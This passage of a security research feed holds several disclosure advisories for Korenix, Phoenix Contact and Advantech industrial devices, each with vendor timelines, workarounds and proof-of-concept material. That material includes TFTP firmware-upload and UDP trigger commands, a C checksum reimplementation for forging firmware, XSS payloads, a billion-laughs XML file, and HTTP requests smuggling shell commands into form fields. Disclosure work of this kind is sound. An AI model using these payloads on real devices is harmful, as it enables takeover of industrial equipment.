The available tftp service is accessable without user authentication. This allows the user to upload and download files to the restricted “/home” folder.

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
A critical security vulnerability has been identified that may allow an unauthenticated attacker to compromise the integrity of a device or cause a denial of service (DoS) condition. This vulnerability resides in the firmware upgrade process of the affected system.

Proof of Concept

1) TFTP Without Authentication (CVE-2023-5376)

The Linux tftp client was used to upload a firmware to the absolute path “/home/firmware.bin”:

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)

Unauthenticated attackers can exploit this by uploading malicious firmware via TFTP and initializing the upgrade process with a crafted UDP packet on port 5010.

We came to the conclusion that the firmware image consists of multiple sections. Our interpretation of these can be seen below:

class FirmwarePart:
def init(self, name, offset, size):
self.name = name
self.offset = offset
self.size = size

firmware_parts = [
FirmwarePart(“uimage_header”, 0x0, 0x40),
FirmwarePart(“uimage_kernel”, 0x40, 0x3c54),
FirmwarePart(“gzip”, 0x3c94, 0x14a000 – 0x3c94),
FirmwarePart(“squashfs”, 0x14a000, 0x539000 – 0x14a000),
FirmwarePart(“metadata”, 0x539000, 5480448 – 0x539000),
]

The squashfs includes the rootfs. Metadata includes a 4 byte checksum which needs to be modified when repacked. During our analysis we observed that the checksum gets calculated over all sections except metadata. To test this vulnerability we reimplemented the checksum calculation at offset 0x9bdc in the binary “/bin/cmd-server2”:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int32_t check_file(const char* arg1) {
FILE* r0 = fopen(arg1, “rb”);

if (!r0) {
return 0xffffffff;
}

int32_t filechecksum = 0;
int32_t last_data_size = 0;
int32_t file_size = 0;
uint8_t data_buf[4096];
int32_t data_len = 1;

while (data_len > 0) {
data_len = fread(data_buf, 1, sizeof(data_buf), r0);

if (data_len == 0) {
break;
}

int32_t counter = 0;
while (counter < (data_len >> 2)) {
int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));
counter++;
filechecksum += byte_at_counter;
}

file_size += data_len;
last_data_size = data_len;
}

fclose(r0);

if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size – 0x14a
000) > 0x5ac000)) {
return 0xffffffff;
}

data_len = 0;
while (data_len < (last_data_size >> 2)) {
int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));
data_len++;
filechecksum -= r3_2;
}

return filechecksum;
}

int main(int argc, char* argv[]) {
if (argc != 2) {
printf(“Usage: %s <file_path>\n”, argv[0]);
return 1;
}

int32_t result = check_file(argv[1]);
printf(“0x%x\n”, result);

return 0;
}

After modifying and repacking the squashfs, we calculated the checksum, patched the required bytes in the metadata section (offset 0x11b-0x11e) and initilized the update process.

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

# echo -e “\x00\x00\x00\x1f\x00\x00\x00\x01\x01” | nc -u $IP 5010

The output of the serial console can be observed below:

Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received
Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi
Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10
Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received
check firmware…
checksum=b2256313, inFileChecksum=b2256313
Firmware upgrading, don’t turn off the switch!
Begin erasing flash:
.
Write firmware.bin (5480448 Bytes) to flash:

Write finished…
Terminating child processes…
Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain
Jan 1 00:01:01 syslogd exiting
Firmware upgrade success!!
waiting for reboot command …….

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a proper patch is available (see “Workaround” section).

Workaround

Beijer representatives provided the following workaround for mitigating the
vulnerabilities on devices of the JetNet series:

Login by terminal:

Switch# configure terminal

Switch(config)# service ipscan disable

Switch(config)# tftpd disable

Switch(config)# copy running-config startup-config

Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947

This commands should be used to deactivate the TFTP daemon on the device to
prevent unauthenticated actors from abusing the service.

Recommendation

Regardless to the current state of the vulnerability, CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.


Contact Timeline

  • 31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 31-08-2023: Receiving contact information. Send vulnerability information.
  • 26-09-2023: Asking about vulnerability status and receiving update release date.
  • 27-10-2023: Received update from contact regarding the firmware update.
  • 29-11-2023: Meeting with contact stating that it effects the whole series.
  • 31-11-2023: Meeting to discuss potential solutions.
  • 11-12-2023: Release delayed due to lack of workaround from manufacturer.
  • 21-12-2023: Manufacturer provides workaround. Release date confirmed.
  • 09-01-2024: Coordinated release of security advisory.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems,  firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

]]>
[EN] St. Pölten UAS | Multiple Vulnerabilities in Phoenix Contact TC Cloud Client, TC Router & Cloud Client https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-phoenix-contact-tc-cloud-client-tc-router-cloud-client/ Tue, 08 Aug 2023 09:52:07 +0000 https://cyberdanube.com/en/?p=4402

Title: Multiple Vulnerabilities
Product: Phoenix Contact TC Cloud Client 1002-4G*, TC Router 3002T-4G, Cloud Client 1101T-TX/TX
Vulnerable version: <2.07.2, <2.07.2, <2.06.10
Fixed version: 2.07.2, 2.07.2, 2.06.10
CVE: CVE-2023-3526, CVE-2023-3569
Impact: Medium
Homepage: https://www.phoenixcontact.com/
Found: 2023-05-04
By: A. Resanovic, S. Stockinger, T. Etzenberger

Disclaimer: This vulnerability was discovery during research at St. Pölten UAS, supported and coordinated by CyberDanube.


Phoenix Contact TC Cloud Client, TC Router & Cloud Client are prone to a Stored Cross-Site Scripting (XSS) and Billion laughs attack.

Vendor description

At Phoenix Contact, our approach is innovative, sustainable, and based on partnership. This applies to how we deal with employees as well as with our customers. We are also conscious of our social and environmental responsibility and we act accordingly. With the vision of the All Electric Society, we also want to empower our customers to act more sustainably by enabling the comprehensive electrification, networking, and automation of all sectors of the economy and infrastructure with our products and solutions.

Source: https://www.phoenixcontact.com/en-us/ueber-uns

Vulnerable versions

TC Router 3002T-4G* / <2.0.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

Vulnerability overview

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggerd in the license viewer of the device. This can be used to execute malicious code in the context of a user’s browser. Cookies may be also stoled via this way.

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569
By abusing the configuration file upload functionality of the device, it is possible to slow down all other processes.

Proof of Concept

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526

The reflected cross-site scripting vulnerability can be triggered by using the following GET request:

https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15″><script>alert(“document.cookie”)</script>

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569

The following configuration file can be used to exploit the binary

“/usr/bin/xmlconfig”, which supportes entity reference nodes:
===============================================================================
<?xml version=”1.0″?>
<!DOCTYPE lolz [
<!ENTITY lol “lol”>
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 “&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;”>
<!ENTITY lol2
“&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;”>
<!ENTITY lol3
“&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;”>
<!ENTITY lol4
“&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;”>
<!ENTITY lol5
“&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;”>
<!ENTITY lol6
“&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;”>
<!ENTITY lol7
“&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;”>
<!ENTITY lol8
“&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;”>
<!ENTITY lol9
“&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;”>
]>
<lolz>&lol9;</lolz>
===============================================================================

Approach

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update to the latest available firmware version.

Workaround

None.

Recommendation

CyberDanube recommends Phoenix Contact customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2023-05-16: Contacting vendor via psirt@phoenixcontact.com
  • 2023-05-17: Vendor informed internal product team.
  • 2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
  • 2023-05-19: Vendor needs more time to fix the issues.
  • 2023-06-15: Vendor asked for an explaination of the issues as he cannot reproduce them; Sent screenshots and more PoCs to the vendor.
    Offered an MS Teams call to clarify the issues.
  • 2023-06-16: Scheduled a call for 2023-06-19.
  • 2023-06-19: Clarified issues and further timeline for the coordination. Vendor proposed to release the firmware on 2023-07-13.
  • 2023-07-04: Contact stated that he has to shift the release after July. It will be released on 08.08.2023; Confirmed the date.
  • 2023-07-13: Received CVE numbers from vendor.
  • 2023-07-18: Received firmware versions from vendor.
  • 2023-07-23:_Vendor released firmwares.
  • 2023-08-08: Coordinated release of security advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

]]>
[EN] St. Pölten UAS | Multiple Vulnerabilities in Advantech EKI-15XX Series https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/ Tue, 08 Aug 2023 09:51:34 +0000 https://cyberdanube.com/en/?p=4397

Title: Multiple Vulnerabilities
Product: Advantech EKI-1524-CE series, EKI-1522 series, EKI-1521 series
Vulnerable version: <=1.21 (CVE-2023-4202), <=1.24 (CVE-2023-4203)
Fixed version: 1.26
CVE: CVE-2023-4202, CVE-2023-4203
Impact: Medium
Homepage: https://advantech.com
Found: 2023-05-04
By: R. Haas, A. Resanovic, T. Etzenberger, M. Bineder

Disclaimer: This vulnerability was discovery during research at St. Pölten UAS, supported and coordinated by CyberDanube.


Advantech EKI-1524/1522/1521 devices are prone to multiple Stored Cross-Site Scripting (XSS).

Vendor description

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21 (CVE-2023-4202)
EKI-1522-CE series / 1.21 (CVE-2023-4202)
EKI-1521-CE series / 1.21 (CVE-2023-4202)
EKI-1524-CE series / 1.24 (CVE-2023-4203)
EKI-1522-CE series / 1.24 (CVE-2023-4203)
EKI-1521-CE series / 1.24 (CVE-2023-4203)

Vulnerability overview

1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)
Two stored cross-site scripting vulnerabilities has been identified in the firmware of the device. The first XSS was identified in the “Device Name” field and the second XSS was found in the “Ping” tool. This can be exploited in the context of a victim’s session.

Proof of Concept

1) Stored Cross-Site Scripting (XSS)

Both cross-site scripting vulnerabilities are permanently affecting the device.

1.1) Stored XSS in Device Name CVE-2023-4202

The first vulnerability can be triggerd by setting the device name
(“System->Device Name”) to the following value:

“><script>alert(“document.cookie”)</script>

This code prints out the cached cookies to the screen.

1.2) Stored XSS in Ping Function CVE-2023-4203

The second XSS vulnerability can be found in “Tools->Ping”. The following GET request prints the current cached cookies of a user’s session to the screen.

http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513

An alternative to the used payload is using “onmouseover” event tags. In this case it prints out the number “1337”: ” onmousemove=”alert(1337)

Approach

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Upgrade to the newest available firmware.

Workaround

None.

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2023-05-16: Contacting vendor via security contact.
  • 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21.
    The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue.
  • 2023-05-25: Contact stated that new firmware should resolve the issue.
  • 2023-06-03: Sent new payload to the vendor.
  • 2023-06-05: Vendor asked for clarification; Sent further explaination to the contact; Vendor contact said he knows a solution.
  • 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues.
  • 2023-06-27: Asked for the release date.
  • 2023-07-04: Contact stated, that they are currently doing QA tests.
  • 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published.
  • 2023-07-17: Assigned CVE numbers for the issues. Asked for an update.
  • 2023-07-18: Vendor contact stated that the firmware will be released end of July.
  • 2023-08-07: Asked contact for the new firmware version.
  • 2023-08-08: Received version 1.26 as the official released firmware with fixes.
    Coordinated release of security advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

]]>
[EN] Multiple Vulnerabilities in Advantech EKI-15XX Series https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/ Wed, 10 May 2023 19:35:21 +0000 https://cyberdanube.com/en/?p=4383

Title: Multiple Vulnerabilities
Product: Advantech EKI-1524-CE series, EKI-1522 series, EKI-1521 series
Vulnerable version: 1.21
Fixed version: 1.24
CVE: CVE-2023-2573, CVE-2023-2574, CVE-2023-2575
Impact: High
Homepage: https://advantech.com
Found: 2023-03-06


Advantech EKI-1524/1522/1521 devices are prone to authenticated command injections and a buffer overflow vulnerability. These vulnerabilities can be used to execute arbitrary commands on OS level.

Vendor description

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

Vulnerable versions

EKI-1524-CE series / 1.21
EKI-1522-CE series / 1.21
EKI-1521-CE series / 1.21

Vulnerability overview

1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)
The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors.

2) Buffer Overflow (CVE-2023-2575)
The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.

Proof of Concept

1) Authenticated Command Injection

The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background.

1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573)

The following POST request executes the command “;ping 10.0.0.1” on the system:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

It is also possible to execute this command without any interceptor proxy by enclose it with “;”, which results in the string “;ping 10.0.0.1;”.

1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)

The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device’s web-interface. A POST request which injects the command “;ls /etc;” can be looks like the following:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

Such command can also be injected by setting the device name to “;ls /etc;”.

2) Buffer Overflow (CVE-2023-2575)

The following POST request can be used to trigger a buffer overflow vulnerability in the web server:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 823
Origin: http://172.16.0.97
Connection: close
Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaa […] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa […]
&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

The serial port of the device provides error messages, which already indicate that the stack has been corrupted:

/ # *** Error in `./index.cgi’: free(): invalid next size (normal): 0x00069828 ***
*** Error in `./index.cgi’: malloc(): memory corruption: 0x00069898 ***

Furthermore, the forked child processes seem to remain in the process list as zombies – three buffer overflows were triggered in this case:

/ # ps
PID USER COMMAND
[…]
935 root ./index.cgi func=setsys
959 root ./index.cgi func=setsys
983 root ./index.cgi func=setsys
[…]

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update the product to the latest available firmware version.

Workaround

None

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2023-03-08: Contacting Advantech via Service Request form; No answer.
  • 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendor responded that EKI-1524/1522/1521 series are affected.
  • 2023-03-20: Asked for status update.
  • 2023-03-21: Vendor responded that the firwmare is currently under testing.
  • 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor.
  • 2023-04-01: Vendor asked multiple question.
  • 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10.
  • 2023-04-10: Clarified further issues.
  • 2023-04-23: Vendor sent notification that a beta release of the firmware is available.
  • 2023-05-02: Vendor sent notification that a new firwmare release is online.
  • 2023-05-04: Asked vendor if the advisory can be published earlier than agreed.
  • 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed.
  • 2023-05-11: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems,  firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

]]>